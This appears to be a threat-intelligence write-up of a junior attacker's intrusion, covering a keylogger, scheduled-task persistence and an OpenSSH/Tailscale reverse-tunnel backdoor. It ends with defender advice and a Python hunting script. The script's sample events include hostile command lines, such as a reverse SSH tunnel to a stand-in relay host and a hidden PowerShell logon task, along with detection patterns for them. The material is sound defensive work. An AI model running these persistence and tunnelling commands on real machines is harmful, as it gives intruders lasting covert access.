Quick version: a French-speaking, somewhat clumsy intruder got into a small automotive business, planted a tiny Python keylogger, and grabbed logins. The weird bit? Before his usual command-and-control (C2) vanished, he installed OpenSSH and Tailscale on a victim machine and built a backdoor that didn’t care whether the C2 lived or died.

The intrusion, step by step

Security researchers recovered the attacker’s full playbook — literally the keystrokes and 339 commands over 33 days — because the operator left SSH keys and notes in an open storage bucket. The operator, nicknamed Poisson, looked like a junior operator: sloppy, on a school-like schedule, and using free-tier services. Still, sloppy can be effective.

The malware itself mostly lived in memory. The chain started with a VBScript stager that waited out sandbox checks and decrypted a PowerShell loader; that loader then pulled a .NET loader, which ran an in-memory agent. For elevation he used a straightforward Start-Process -Verb RunAs, which pops a UAC prompt and waits for somebody to click yes — not stealthy, but it worked after several tries on at least one victim.

Once elevated, the attacker went persistent: a scheduled task that ran at every logon with high privileges, shellcode injected into explorer.exe, and a custom remote tool as a backup. The credential theft was low-tech: a 70-line Python keylogger that wrote keystrokes to a local file. No network beacon, no exfil server — the operator just logged back in and grabbed the file by hand. He even used powercfg to keep the machines awake so the keylogger didn’t miss anything.

The move that bought him long-term access happened overnight across a few hours: he installed an SSH server on Windows, joined the host to his private mesh network, and set up key-based SSH plus a reverse tunnel. That meant he could reach the machine over the encrypted mesh without touching his C2 or exposing ports. When the C2 dropped the next day, the door he built kept working. When the C2 later came back online, agents reconnected automatically — no re-compromise needed.

Interestingly, the attacker’s goals were narrow and direct: steal what people type (bank logins, email passwords, government portal creds). No flashy lateral moves, no ransomware, no big data heist. The tools were legitimate, signed binaries, which makes them easy to miss if your detections only look for suspicious files instead of suspicious behavior.

What defenders should watch

If you take one thing from this: pulling a C2 off the internet is not a full fix if the attacker has built a separate access path. Hunt for the quiet persistence that outlives takedowns.

  • Alert on installation of OpenSSH Server on Windows workstations — that’s rare and suspicious.
  • Flag tailscale.exe running on systems that don’t need VPN or mesh networking.
  • Look for SSH reverse tunnels (ssh -R) heading out to unknown hosts.
  • Watch for wscript.exe or similar launching .vbs files from user staging folders.
  • Flag scheduled tasks created with highest privileges that launch script interpreters.
  • Monitor changes to powercfg standby/timeout settings (keeps machines awake for harvesting).
  • Block or monitor wildcard DNS services like DuckDNS used for toy infrastructure.
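As an added illustration of the checklist above (not from the original write-up), here is a small Python hunting script that applies those rules to process-creation events. The event fields, host names, the mesh-VPN allowlist, and the sample events are constructed assumptions.

```python
import re

# Assumed: hosts that legitimately run mesh VPN clients (hypothetical allowlist).
MESH_ALLOWLIST = {"it-admin-01"}
INTERPRETERS = ("powershell", "pwsh", "wscript", "cscript", "cmd.exe", "mshta", "python")


def classify(ev):
    """Return the detection names triggered by one process-creation event."""
    img, cmd, hits = ev["image"].lower(), ev["cmd"].lower(), []
    if img.endswith("sshd.exe") or "openssh.server" in cmd:
        hits.append("openssh_server_install")            # OpenSSH Server on a workstation
    if img.endswith("tailscale.exe") and ev["host"].lower() not in MESH_ALLOWLIST:
        hits.append("unexpected_mesh_vpn")               # tailscale.exe where it is not expected
    if img.endswith("ssh.exe") and re.search(r"(^|\s)-R\s*\S+", ev["cmd"]):
        hits.append("ssh_reverse_tunnel")                # case-sensitive: -R is remote forwarding
    if img.endswith(("wscript.exe", "cscript.exe")) and re.search(r"\\users\\[^\\]+\\.*\.vbs", cmd):
        hits.append("vbs_from_user_folder")              # script host running .vbs from a user profile
    if img.endswith("schtasks.exe") and "/create" in cmd and "/rl highest" in cmd \
            and any(i in cmd for i in INTERPRETERS):
        hits.append("highpriv_task_runs_interpreter")    # highest-privilege task launching a script host
    if img.endswith("powercfg.exe") and re.search(r"(standby|monitor|disk)-timeout-(ac|dc)\s+0\b", cmd):
        hits.append("powercfg_keepawake")                # timeout 0 = never sleep
    return hits


def hunt(events):
    """Group triggered detections by host: {host: set(detection_names)}."""
    findings = {}
    for ev in events:
        for hit in classify(ev):
            findings.setdefault(ev["host"], set()).add(hit)
    return findings


# Constructed sample events in a Sysmon-like shape (host, image path, command line).
SAMPLE_EVENTS = [
    {"host": "ws-sales-07", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -c Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"},
    {"host": "ws-sales-07", "image": r"C:\Program Files\Tailscale\tailscale.exe", "cmd": "tailscale up"},
    {"host": "ws-sales-07", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmd": "ssh -N -R 2222:localhost:22 relay.example.invalid"},
    {"host": "ws-sales-07", "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\anne\AppData\Local\Temp\invoice.vbs"'},
    {"host": "ws-sales-07", "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /Create /TN Updater /SC ONLOGON /RL HIGHEST /TR "powershell -w hidden -f C:\Users\anne\u.ps1"'},
    {"host": "ws-sales-07", "image": r"C:\Windows\System32\powercfg.exe", "cmd": "powercfg /change standby-timeout-ac 0"},
    {"host": "it-admin-01", "image": r"C:\Program Files\Tailscale\tailscale.exe", "cmd": "tailscale status"},  # allowlisted
    {"host": "ws-sales-07", "image": r"C:\Windows\System32\wscript.exe", "cmd": r"wscript.exe C:\ProgramData\Vendor\inventory.vbs"},  # benign path
]
```

Running hunt(SAMPLE_EVENTS) flags every rule on ws-sales-07 and nothing on the allowlisted admin host; in practice the event dicts would come from your EDR or Sysmon export.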

Also check for leftover SSH keys, unexpected scheduled tasks, unknown services, and any odd remote-access tooling. The practical takeaway: treat a C2 takedown as the start of an investigation, not the finish line.

Final note: the attacker wasn’t a master craftsman, but he used simple, legitimate tools in a clever sequence and left a resilient backdoor. That combo — boring tools, smart chaining — is exactly what makes these intrusions painful to clean up.